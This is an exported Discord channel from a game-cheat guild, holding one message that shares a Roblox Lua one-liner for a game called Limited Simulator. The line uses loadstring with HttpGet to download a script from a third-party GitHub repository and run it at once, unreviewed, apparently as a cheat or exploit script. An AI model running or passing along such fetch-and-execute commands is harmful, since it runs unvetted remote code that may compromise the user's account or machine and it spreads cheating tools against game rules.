==============================================================
Guild: BIGGEST SETS,METH0DS,T00LS,AIMLOCKS VAULT
Channel: other game scripts / limited-sim
==============================================================

[AM] deleted user#3213
```
loadstring(game:HttpGet("https://raw.githubusercontent.com/CasperFlyModz/discord.gg-rips/main/LimitedSimulator.lua%22))()
```


==============================================================
Exported 1 message(s)
==============================================================
